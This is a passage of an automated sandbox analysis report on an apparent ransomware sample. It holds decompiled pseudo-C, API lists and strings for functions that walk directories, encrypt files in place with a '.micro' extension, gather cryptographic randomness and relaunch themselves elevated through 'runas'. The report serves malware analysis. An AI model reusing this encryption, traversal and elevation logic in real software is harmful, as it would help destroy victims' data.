					if(_t7 != 0) {
						break;
					}
					_t12 =  *0x44121c - _t4; // 0x0
					if(_t12 > 0) {
						Sleep(_t8);
						_t3 = _t8 + 0x3e8; // 0x3e8
						_t6 = _t3;
						_t13 = _t6 -  *0x44121c; // 0x0
						if(_t13 > 0) {
							_t6 = _t6 | 0xffffffff;
						}
						_t8 = _t6;
						if(_t6 != 0xffffffff) {
							continue;
						}
					}
					break;
				}
				return _t7;
			}

0x0042d166
0x0042d168
0x0042d170
0x0042d175
0x0042d177
0x0042d17c
0x00000000
0x00000000
0x0042d17e
0x0042d184
0x0042d187
0x0042d18d
0x0042d18d
0x0042d193
0x0042d199
0x0042d19b
0x0042d19b
0x0042d19e
0x0042d1a3
0x00000000
0x00000000
0x0042d1a3
0x00000000
0x0042d184
0x0042d1aa

APIs

Part of subcall function 0042E650: HeapAlloc.KERNEL32(00000008,?,00000000,?,0042D175,00000000,?,00000000,00000000,00000000,?,0042A9B7,00000001,00000214), ref: 0042E693

Sleep.KERNEL32(00000000), ref: 0042D187

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Non-executed Functions

Function 0041C8F0, Relevance: 103.7, APIs: 35, Strings: 24, Instructions: 472

APIs

GetVersionExW.KERNEL32 ref: 0041C92C
LoadLibraryW.KERNEL32(ADVAPI32.DLL), ref: 0041C93D
LoadLibraryW.KERNEL32(KERNEL32.DLL), ref: 0041C948
LoadLibraryW.KERNEL32(NETAPI32.DLL), ref: 0041C951
GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 0041C969
GetProcAddress.KERNEL32(00000000,NetApiBufferFree), ref: 0041C975
FreeLibrary.KERNEL32(00000000), ref: 0041CA37
GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 0041CA4F
GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 0041CA5D
GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 0041CA6D
FreeLibrary.KERNEL32(?), ref: 0041CB4F
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0041CB65
GetProcAddress.KERNEL32(00000000,CloseToolhelp32Snapshot), ref: 0041CB71
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0041CB7D
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0041CB89
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0041CB95
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0041CBA1
GetProcAddress.KERNEL32(00000000,Process32First), ref: 0041CBAD
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0041CBB9
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0041CBC5
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0041CBD1
GetProcAddress.KERNEL32(00000000,Module32First), ref: 0041CBDD
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0041CBE9
GetTickCount.KERNEL32 ref: 0041CC83
GetTickCount.KERNEL32 ref: 0041CD36
GetTickCount.KERNEL32 ref: 0041CD52
GetTickCount.KERNEL32 ref: 0041CDA6
GetTickCount.KERNEL32 ref: 0041CDBE
GetTickCount.KERNEL32 ref: 0041CE12
GetTickCount.KERNEL32 ref: 0041CE2A
GetTickCount.KERNEL32 ref: 0041CE87
CloseHandle.KERNEL32(?), ref: 0041CEA3
FreeLibrary.KERNEL32(00000000), ref: 0041CEAA

Part of subcall function 0041CF50: QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?), ref: 0041CF65
Part of subcall function 0041CF50: GetTickCount.KERNEL32(?,00000000,?,?), ref: 0041CFAC

GlobalMemoryStatus.KERNEL32(?), ref: 0041CEBD
GetCurrentProcessId.KERNEL32 ref: 0041CEF4

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

CryptReleaseContext, xrefs: 0041CA63
LanmanWorkstation, xrefs: 0041C998
Process32Next, xrefs: 0041CBAF
Intel Hardware Cryptographic Service Provider, xrefs: 0041CAEE
Thread32First, xrefs: 0041CBBB
Thread32Next, xrefs: 0041CBC7
Heap32ListNext, xrefs: 0041CB97
CryptAcquireContextW, xrefs: 0041CA49
ADVAPI32.DLL, xrefs: 0041C938
NETAPI32.DLL, xrefs: 0041C94A
CryptGenRandom, xrefs: 0041CA57
CreateToolhelp32Snapshot, xrefs: 0041CB5D
Heap32First, xrefs: 0041CB73
NetStatisticsGet, xrefs: 0041C963
Module32First, xrefs: 0041CBD3
NetApiBufferFree, xrefs: 0041C96B
LanmanServer, xrefs: 0041C9EC
KERNEL32.DLL, xrefs: 0041C93F
Process32First, xrefs: 0041CBA3
$, xrefs: 0041CCD5
Heap32Next, xrefs: 0041CB7F
CloseToolhelp32Snapshot, xrefs: 0041CB67
Heap32ListFirst, xrefs: 0041CB8B
Module32Next, xrefs: 0041CBDF

Memory Dump Source

Source File: 00000000.00000002.227365714.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 00413E50, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 340

C-Code - Quality: 89%

			E00413E50(WCHAR* __ecx) {
				signed int _v8;
				char _v9;
				short _v11;
				intOrPtr _v12;
				short _v15;
				intOrPtr _v16;
				short _v19;
				intOrPtr _v20;
				short _v23;
				char _v24;
				char _v25;
				short _v27;
				short _v31;
				short _v35;
				short _v39;
				short _v43;
				short _v47;
				short _v51;
				short _v55;
				char _v56;
				char _v8250;
				short _v8252;
				char _v8500;
				long _v8504;
				short _v8508;
				short _v8512;
				short _v8516;
				void _v8520;
				void* _v8524;
				long _v8528;
				long _v8532;
				WCHAR* _v8536;
				intOrPtr _v8540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t80;
				signed int _t90;
				long _t91;
				void* _t98;
				char _t100;
				intOrPtr _t101;
				void* _t142;
				void* _t152;
				intOrPtr _t153;
				intOrPtr _t154;
				intOrPtr _t172;
				intOrPtr _t173;
				void* _t179;
				void* _t180;
				void* _t181;
				signed int _t182;

				E0042E220(0x215c);
				_t80 =  *0x43f054; // 0xd46ffb00
				_v8 = _t80 ^ _t182;
				_t179 = __ecx;
				_v8536 = __ecx;
				_v8520 = 0;
				_v8516 = 0;
				_v8512 = 0;
				_v8508 = 0;
				_v8504 = 0;
				_v56 = 0;
				_v55 = 0;
				_v51 = 0;
				_v47 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_v31 = 0;
				_v27 = 0;
				_v25 = 0;
				_v24 = 0;
				_v23 = 0;
				_v19 = 0;
				_v15 = 0;
				_v11 = 0;
				_v9 = 0;
				_v8528 = 0;
				_v8252 = 0;
				E0042D0A0( &_v8250, 0, 0x1ffe);
				_t170 =  &_v8252;
				E00425E37( &_v8252, 0x1000, _t179, 0xffffffff);
				E00426165( &_v8252, 0x1000, L".micro", 0xffffffff);
				_t181 = GetProcessHeap();
				if(_t181 == 0) {
					L17:
					return E004256FE(_t87 | 0xffffffff, _t142, _v8 ^ _t182, _t170, _t179, _t181);
				} else {
					_t87 = GetFileAttributesW(_t179);
					if(_t87 == 0xffffffff) {
						goto L17;
					} else {
						if((_t87 & 0x00000001) != 0) {
							SetFileAttributesW(_t179, _t87 & 0xfffffffe);
						}
						_t179 = CreateFileW(_t179, 0xc0000000, 0, 0, 3, 0x80, 0);
						if(_t179 == 0xffffffff) {
							goto L17;
						} else {
							_t90 = GetFileSize(_t179, 0);
							_v8524 = _t90;
							if(_t90 == 0xffffffff || _t90 == 0 || _t90 < 0x20 || _t90 > 0x13800000) {
								L16:
								_t87 = CloseHandle(_t179);
								goto L17;
							} else {
								_t170 = _t90 & 0x0000000f;
								_t91 = _t90 + 0x10;
								_v8540 = 0x10 - (_t90 & 0x0000000f);
								_v8532 = _t91;
								_t142 = HeapAlloc(_t181, 0, _t91);
								if(_t142 == 0) {
									goto L16;
								} else {
									if(ReadFile(_t179, _t142, _v8524,  &_v8504, 0) != 0) {
										if( *_t142 != 0) {
											_t152 = _v8524;
											if(_t152 == _v8504) {
												_t170 = _t142 + _t152;
												E0042D0A0(_t142 + _t152, _v8540, _v8540);
												_t98 = HeapAlloc(_t181, 0, _v8532);
												_v8524 = _t98;
												if(_t98 == 0) {
													goto L15;
												} else {
													_t100 =  *0x433cb4; // 0xbf0a5127
													_t153 =  *0x433cb8; // 0x26698d31
													_t172 =  *0x433cbc; // 0x2b977817
													_v8520 = _t100;
													_v24 = _t100;
													_t101 =  *0x433cbc; // 0x2b977817
													_v8516 = _t153;
													_v20 = _t153;
													_t154 =  *0x441d18; // 0x0
													_v8512 = _t172;
													_t173 =  *0x433cc0; // 0x9ff67d98
													_v16 = _t101;
													_v8508 = _t173;
													_v12 = _t173;
													E0040D9C0( &_v56, _t154, _t154);
													_push( &_v8500);
													_push( &_v56);
													E00424040();
													_push( &_v8500);
													_push( &_v24);
													_t176 = _v8524;
													_push(_t142);
													if(E0041BC70(_v8532, _v8524) != 1) {
														SetFilePointer(_t179, 0, 0, 0);
														_v8528 = 0;
														if(WriteFile(_t179, 0x441e58, 0x15c,  &_v8528, 0) != 0) {
															_v8528 = 0;
															if(WriteFile(_t179,  &_v8520, 0x14,  &_v8528, 0) == 0) {
																goto L22;
															} else {
																_t176 = _v8524;
																_v8528 = 0;
																if(WriteFile(_t179, _v8524, _v8532,  &_v8528, 0) == 0) {
																	goto L20;
																} else {
																	FlushFileBuffers(_t179);
																	CloseHandle(_t179);
																	_t180 = 0;
																	while(MoveFileExW(_v8536,  &_v8252, 8) == 0) {
																		if(GetLastError() == 0xb7) {
																			DeleteFileW( &_v8252);
																		}
																		Sleep(0x190);
																		_t180 = _t180 + 1;
																		if(_t180 < 4) {
																			continue;
																		}
																		break;
																	}
																	 *0x441ff8 =  *0x441ff8 + _v8532;
																	_t179 = HeapFree;
																	asm("adc dword [0x441ffc], 0x0");
																	HeapFree(_t181, 0, _t142);
																	_t170 = _v8524;
																	HeapFree(_t181, 0, _v8524);
																	goto L31;
																}
															}
														} else {
															L22:
															HeapFree(_t181, 0, _t142);
															HeapFree(_t181, 0, _v8524);
															return E004256FE(CloseHandle(_t179) | 0xffffffff, HeapFree, _v8 ^ _t182, _v8524, _t179, _t181);
														}
													} else {
														L20:
														HeapFree(_t181, 0, _t142);
														HeapFree(_t181, 0, _v8524);
														return E004256FE(CloseHandle(_t179) | 0xffffffff, HeapFree, _v8 ^ _t182, _t176, _t179, _t181);
													}
												}
											} else {
												L15:
												HeapFree(_t181, 0, _t142);
												goto L16;
											}
										} else {
											CloseHandle(_t179);
											HeapFree(_t181, 0, _t142);
											L31:
											return E004256FE(1, _t142, _v8 ^ _t182, _t170, _t179, _t181);
										}
									} else {
										CloseHandle(_t179);
										return E004256FE(HeapFree(_t181, 0, _t142) | 0xffffffff, _t142, _v8 ^ _t182, _t170, _t179, _t181);
									}
								}
							}
						}
					}
				}
			}

0x00413e5a
0x00413e5f
0x00413e66
0x00413e6e
0x00413e7d
0x00413e83
0x00413e89
0x00413e8f
0x00413e95
0x00413e9b
0x00413ea1
0x00413ea4
0x00413ea7
0x00413eaa
0x00413ead
0x00413eb0
0x00413eb3
0x00413eb6
0x00413eb9
0x00413ebd
0x00413ec0
0x00413ec3
0x00413ec6
0x00413ec9
0x00413ecc
0x00413ed0
0x00413ed3
0x00413ed9
0x00413ee0
0x00413eeb
0x00413ef7
0x00413f0f
0x00413f1d
0x00413f21
0x00414043
0x00414056
0x00413f27
0x00413f28
0x00413f31
0x00000000
0x00413f37
0x00413f39
0x00413f40
0x00413f40
0x00413f5f
0x00413f64
0x00000000
0x00413f6a
0x00413f6d
0x00413f73
0x00413f7c
0x0041403c
0x0041403d
0x00000000
0x00413f9e
0x00413fa0
0x00413faa
0x00413fb0
0x00413fb6
0x00413fc2
0x00413fc6
0x00000000
0x00413fc8
0x00413fe2
0x0041400c
0x00414024
0x00414030
0x0041405f
0x00414063
0x00414075
0x0041407b
0x00414083
0x00000000
0x00414085
0x00414085
0x0041408a
0x00414090
0x00414096
0x0041409c
0x0041409f
0x004140a4
0x004140aa
0x004140ad
0x004140b3
0x004140b9
0x004140bf
0x004140c6
0x004140cc
0x004140cf
0x004140dd
0x004140e1
0x004140e2
0x004140ed
0x004140f7
0x004140f8
0x004140fe
0x0041410a
0x00414146
0x00414160
0x00414172
0x004141ba
0x004141cc
0x00000000
0x004141ce
0x004141d4
0x004141e6
0x004141f8
0x00000000
0x004141fe
0x004141ff
0x00414206
0x0041420c
0x00414210
0x00414235
0x0041423e
0x0041423e
0x00414249
0x0041424f
0x00414253
0x00000000
0x00000000
0x00000000
0x00414253
0x0041425b
0x00414261
0x00414268
0x00414272
0x00414274
0x0041427e
0x00000000
0x0041427e
0x004141f8
0x00414174
0x00414174
0x0041417e
0x0041418a
0x004141a6
0x004141a6
0x0041410c
0x0041410c
0x00414116
0x00414122
0x0041413e
0x0041413e
0x0041410a
0x00414032
0x00414032
0x00414036
0x00000000
0x00414036
0x0041400e
0x0041400f
0x00414019
0x00414280
0x00414295
0x00414295
0x00413fe4
0x00413fe5
0x00414008
0x00414008
0x00413fe2
0x00413fc6
0x00413f7c
0x00413f64
0x00413f31

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,00442040,?,00413E04), ref: 00413F17
GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00442040,?,00413E04), ref: 00413F28
SetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,00442040,?,00413E04), ref: 00413F40
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413F59
GetFileSize.KERNEL32(00000000,00000000,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413F6D
HeapAlloc.KERNEL32(00000000,00000000,00000000,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413FBC
ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00413FDA
CloseHandle.KERNEL32(00000000), ref: 00413FE5
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00413FEF
CloseHandle.KERNEL32(00000000), ref: 0041400F
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00414019
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00414036

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

HeapAlloc.KERNEL32(00000000,00000000,?,00000080,00000000,?,?,?,?,?,?,?,?,?,00442040), ref: 00414075
CloseHandle.KERNEL32(00000000), ref: 0041403D

Part of subcall function 0040D9C0: _aullshr.NTDLL ref: 0040DA3D

HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00414116
HeapFree.KERNEL32(00000000,00000000,?), ref: 00414122
CloseHandle.KERNEL32(00000000), ref: 00414125
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00414146
WriteFile.KERNEL32 ref: 0041416A
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0041417E
HeapFree.KERNEL32(00000000,00000000,?), ref: 0041418A
CloseHandle.KERNEL32(00000000), ref: 0041418D
WriteFile.KERNEL32(00000000,?,00000014,00000000,00000000), ref: 004141C4
WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 004141F0
FlushFileBuffers.KERNEL32(00000000), ref: 004141FF
CloseHandle.KERNEL32(00000000), ref: 00414206
MoveFileExW.KERNEL32(?,?,00000008), ref: 00414220
GetLastError.KERNEL32 ref: 0041422A
DeleteFileW.KERNEL32(?), ref: 0041423E
Sleep.KERNEL32(00000190), ref: 00414249
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00414272
HeapFree.KERNEL32(00000000,00000000,?), ref: 0041427E

Strings

.micro, xrefs: 00413EFE

Memory Dump Source

Source File: 00000000.00000002.227365714.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0042D4E5, Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 134

APIs

Part of subcall function 0042A855: EncodePointer.KERNEL32(00000000,0042D50B,00440828,00000314,00000000,?,?,?,?,?,00428B12,00440828,Microsoft Visual C++ Runtime Library,00012010), ref: 0042A857

LoadLibraryW.KERNEL32(USER32.DLL), ref: 0042D520
GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 0042D53C
EncodePointer.KERNEL32(00000000), ref: 0042D54D
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0042D55A
EncodePointer.KERNEL32(00000000), ref: 0042D55D
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0042D56A
EncodePointer.KERNEL32(00000000), ref: 0042D56D
GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 0042D57A
EncodePointer.KERNEL32(00000000), ref: 0042D57D
GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0042D58E
EncodePointer.KERNEL32(00000000), ref: 0042D591
DecodePointer.KERNEL32(00000000,00440828,00000314,00000000), ref: 0042D5B3
DecodePointer.KERNEL32 ref: 0042D5BD
DecodePointer.KERNEL32(?,00440828,00000314,00000000), ref: 0042D5FC
DecodePointer.KERNEL32(?), ref: 0042D616
DecodePointer.KERNEL32(00440828,00000314,00000000), ref: 0042D62A

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

GetLastActivePopup, xrefs: 0042D55F
GetUserObjectInformationW, xrefs: 0042D56F
MessageBoxW, xrefs: 0042D536
GetActiveWindow, xrefs: 0042D54F
GetProcessWindowStation, xrefs: 0042D588
USER32.DLL, xrefs: 0042D51B

Memory Dump Source

Source File: 00000000.00000002.227365714.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0041E880, Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 106

C-Code - Quality: 75%

			E0041E880() {
				signed int _v8;
				char _v528;
				short _v1048;
				char _v2088;
				struct _SHELLEXECUTEINFOW _v2148;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				long _t31;
				void* _t46;
				void* _t59;
				void* _t61;
				signed int _t66;

				_t64 = _t66;
				_t24 =  *0x43f054; // 0xd46ffb00
				_v8 = _t24 ^ _t66;
				E0042D0A0( &_v2088, 0, 0x410);
				E0042D0A0( &_v1048, 0, 0x208);
				_t56 =  &_v528;
				E0042D0A0( &_v528, 0, 0x208);
				_t31 = GetEnvironmentVariableW(L"windir",  &_v1048, 0x208);
				if(_t31 != 0 && _t31 <= 0x208) {
					_t56 =  &_v2088;
					if(E0041E810(0x410,  &_v2088, L"%s\\system32\\cmd.exe",  &_v1048) == 0) {
						_push(_t61);
						E0042623B( &_v528, 0x104, L"/c start \"\" \"");
						E00425ACD( &_v528, 0x104, "C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe");
						E00425ACD( &_v528, 0x104, "\"");
						E0042D0A0( &_v2148, 0, 0x3c);
						_v2148.cbSize = 0x3c;
						_v2148.lpVerb = L"runas";
						_v2148.lpFile =  &_v2088;
						_v2148.lpParameters =  &_v528;
						_v2148.nShow = 0;
						_v2148.fMask = 0x40;
						if(ShellExecuteExW( &_v2148) == 0) {
							_push(_t46);
							_push(_t59);
							while(GetLastError() == 0x4c7) {
								Sleep(0x3e8);
								if(ShellExecuteExW( &_v2148) == 0) {
									continue;
								}
								break;
							}
							_pop(_t59);
							_pop(_t46);
						}
						_t56 = _v2148.hProcess;
						CloseHandle(_v2148.hProcess);
						_pop(_t61);
					}
				}
				return E004256FE(1, _t46, _v8 ^ _t64, _t56, _t59, _t61);
			}

0x0041e883
0x0041e88b
0x0041e892
0x0041e8a3
0x0041e8b6
0x0041e8c0
0x0041e8c9
0x0041e8e2
0x0041e8ea
0x0041e902
0x0041e91d
0x0041e923
0x0041e935
0x0041e94b
0x0041e961
0x0041e971
0x0041e992
0x0041e99c
0x0041e9a6
0x0041e9ac
0x0041e9b2
0x0041e9bc
0x0041e9ca
0x0041e9cc
0x0041e9d3
0x0041e9e0
0x0041e9ee
0x0041e9fb
0x00000000
0x00000000
0x00000000
0x0041e9fb
0x0041e9fd
0x0041e9fe
0x0041e9fe
0x0041e9ff
0x0041ea06
0x0041ea0c
0x0041ea0c
0x0041e91d
0x0041ea1f

APIs

GetEnvironmentVariableW.KERNEL32(windir,?,00000208), ref: 0041E8E2
ShellExecuteExW.SHELL32(?), ref: 0041E9C6
GetLastError.KERNEL32 ref: 0041E9E0
Sleep.KERNEL32(000003E8), ref: 0041E9EE
ShellExecuteExW.SHELL32(0000003C), ref: 0041E9F7
CloseHandle.KERNEL32(?), ref: 0041EA06

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Part of subcall function 0041E810: _vsnwprintf.NTDLL ref: 0041E841

Strings

/c start "" ", xrefs: 0041E924
runas, xrefs: 0041E99C
@, xrefs: 0041E9BC
windir, xrefs: 0041E8DD
<, xrefs: 0041E992
%s\system32\cmd.exe, xrefs: 0041E908
C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe, xrefs: 0041E93A

Memory Dump Source

Source File: 00000000.00000002.227365714.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 00413AB0, Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 273

C-Code - Quality: 90%

			E00413AB0(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				char _v8202;
				short _v8204;
				char _v16394;
				char _v16396;
				struct _WIN32_FIND_DATAW _v16988;
				void* _v16992;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t55;
				intOrPtr* _t71;
				char* _t85;
				char* _t86;
				intOrPtr* _t88;
				intOrPtr* _t92;
				intOrPtr* _t93;
				intOrPtr* _t94;
				intOrPtr* _t102;
				intOrPtr _t110;
				intOrPtr* _t114;
				intOrPtr* _t115;
				intOrPtr _t116;
				intOrPtr* _t118;
				intOrPtr* _t119;
				intOrPtr* _t120;
				void* _t128;
				void* _t131;
				signed int _t133;
				void* _t134;
				void* _t138;
				void* _t139;
				void* _t142;
				void* _t144;

				E0042E220(0x425c);
				_t55 =  *0x43f054; // 0xd46ffb00
				_v8 = _t55 ^ _t133;
				_t102 = _a4;
				_v8204 = 0;
				E0042D0A0( &_v8202, 0, 0x1ffe);
				_v16396 = 0;
				E0042D0A0( &_v16394, 0, 0x1ffe);
				E0042623B( &_v8204, 0x1000, _t102);
				_t124 =  &_v8204;
				E00425ACD( &_v8204, 0x1000, L"\\*.*");
				_t138 = _t134 + 0x30;
				_t131 = FindFirstFileW( &_v8204,  &_v16988);
				_v16992 = _t131;
				if(_t131 != 0xffffffff) {
					do {
						if((_v16988.dwFileAttributes & 0x00000010) == 0) {
							if(_a8 == 1) {
								E0042623B( &_v8204, 0x1000, _t102);
								E00425ACD( &_v8204, 0x1000, 0x43456c);
								E00425ACD( &_v8204, 0x1000,  &(_v16988.cFileName));
								_t71 =  &(_v16988.cFileName);
								_t142 = _t138 + 0x24;
								_t124 = _t71 + 2;
								do {
									_t110 =  *_t71;
									_t71 = _t71 + 2;
								} while (_t110 != 0);
								_t130 = (_t71 - _t124 >> 1) + 1;
								_t132 = E0042629E( &(_v16988.cFileName));
								E0042614E(_t75, (_t71 - _t124 >> 1) + 1);
								_t144 = _t142 + 0xc;
								if(E00413A40(L"recove", _t75) == 0 && E00413A40(L".micro", _t132) == 0 && E004142A0(_t132) == 1) {
									E00413E50( &_v8204);
								}
								E004258E3(_t132);
								_t131 = _v16992;
								goto L55;
							}
						} else {
							_t114 =  &(_v16988.cFileName);
							_t85 = ".";
							while(1) {
								_t124 =  *_t85;
								if(_t124 !=  *_t114) {
									break;
								}
								if(_t124 == 0) {
									L7:
									_t85 = 0;
								} else {
									_t16 =  &(_t85[2]); // 0x2e0000
									_t124 =  *_t16;
									if(_t124 !=  *((intOrPtr*)(_t114 + 2))) {
										break;
									} else {
										_t85 =  &(_t85[4]);
										_t114 = _t114 + 4;
										if(_t124 != 0) {
											continue;
										} else {
											goto L7;
										}
									}
								}
								L9:
								if(_t85 != 0) {
									_t115 =  &(_v16988.cFileName);
									_t86 = L"..";
									while(1) {
										_t124 =  *_t86;
										if(_t124 !=  *_t115) {
											break;
										}
										if(_t124 == 0) {
											L15:
											_t86 = 0;
										} else {
											_t19 =  &(_t86[2]); // 0x2e
											_t124 =  *_t19;
											if(_t124 !=  *((intOrPtr*)(_t115 + 2))) {
												break;
											} else {
												_t86 =  &(_t86[4]);
												_t115 = _t115 + 4;
												if(_t124 != 0) {
													continue;
												} else {
													goto L15;
												}
											}
										}
										L17:
										if(_t86 != 0) {
											E0042623B( &_v8204, 0x1000, _t102);
											_t88 = _t102;
											_t139 = _t138 + 0xc;
											_t22 = _t88 + 2; // 0x442042
											_t128 = _t22;
											do {
												_t116 =  *_t88;
												_t88 = _t88 + 2;
											} while (_t116 != 0);
											if(_t88 - _t128 >> 1 > 3) {
												E00425ACD( &_v8204, 0x1000, 0x43456c);
												_t139 = _t139 + 0xc;
											}
											E00425ACD( &_v8204, 0x1000,  &(_v16988.cFileName));
											_t138 = _t139 + 0xc;
											_t118 =  &_v8204;
											_t92 = 0x478238;
											while(1) {
												_t124 =  *_t92;
												if(_t124 !=  *_t118) {
													break;
												}
												if(_t124 == 0) {
													L27:
													_t92 = 0;
												} else {
													_t124 =  *((intOrPtr*)(_t92 + 2));
													if(_t124 !=  *((intOrPtr*)(_t118 + 2))) {
														break;
													} else {
														_t92 = _t92 + 4;
														_t118 = _t118 + 4;
														if(_t124 != 0) {
															continue;
														} else {
															goto L27;
														}
													}
												}
												L29:
												if(_t92 != 0) {
													_t119 =  &_v8204;
													_t93 = 0x47a238;
													while(1) {
														_t124 =  *_t93;
														if(_t124 !=  *_t119) {
															break;
														}
														if(_t124 == 0) {
															L35:
															_t93 = 0;
														} else {
															_t124 =  *((intOrPtr*)(_t93 + 2));
															if(_t124 !=  *((intOrPtr*)(_t119 + 2))) {
																break;
															} else {
																_t93 = _t93 + 4;
																_t119 = _t119 + 4;
																if(_t124 != 0) {
																	continue;
																} else {
																	goto L35;
																}
															}
														}
														L37:
														if(_t93 != 0) {
															_t120 =  &_v8204;
															_t94 = 0x47c238;
															while(1) {
																_t124 =  *_t94;
																if(_t124 !=  *_t120) {
																	break;
																}
																if(_t124 == 0) {
																	L43:
																	_t94 = 0;
																} else {
																	_t124 =  *((intOrPtr*)(_t94 + 2));
																	if(_t124 !=  *((intOrPtr*)(_t120 + 2))) {
																		break;
																	} else {
																		_t94 = _t94 + 4;
																		_t120 = _t120 + 4;
																		if(_t124 != 0) {
																			continue;
																		} else {
																			goto L43;
																		}
																	}
																}
																L45:
																if(_t94 != 0) {
																	E00413AB0( &_v8204, _a8);
																	_t124 =  &_v8204;
																	E0042623B( &_v16396, 0x1000,  &_v8204);
																	_t144 = _t138 + 0x14;
																	E00413500( &_v16396);
																	L55:
																	_t138 = _t144 + 4;
																}
																goto L56;
															}
															asm("sbb eax, eax");
															asm("sbb eax, 0xffffffff");
															goto L45;
														}
														goto L56;
													}
													asm("sbb eax, eax");
													asm("sbb eax, 0xffffffff");
													goto L37;
												}
												goto L56;
											}
											asm("sbb eax, eax");
											asm("sbb eax, 0xffffffff");
											goto L29;
										}
										goto L56;
									}
									asm("sbb eax, eax");
									asm("sbb eax, 0xffffffff");
									goto L17;
								}
								goto L56;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L9;
						}
						L56:
					} while (FindNextFileW(_t131,  &_v16988) != 0);
					_t64 = FindClose(_t131);
				}
				return E004256FE(_t64, _t102, _v8 ^ _t133, _t124, _t130, _t131);
			}

0x00413aba
0x00413abf
0x00413ac6
0x00413aca
0x00413ade
0x00413ae5
0x00413afc
0x00413b03
0x00413b18
0x00413b25
0x00413b31
0x00413b36
